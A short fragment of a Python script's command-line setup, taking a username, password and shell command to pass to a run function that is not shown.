parser.add_argument("-u", dest="username", required="yes",
help="Username to authenticate")
parser.add_argument("-p", dest="password", required="yes",
help="Password to authenticate")
parser.add_argument("-c", dest="command", required="yes", help="Shell
command to execute")
# Assigns the arguments to various variables
args = parser.parse_args()
run(args.target, args.username, args.password, args.command)
#
# Main
#
if __name__ == "__main__":
main()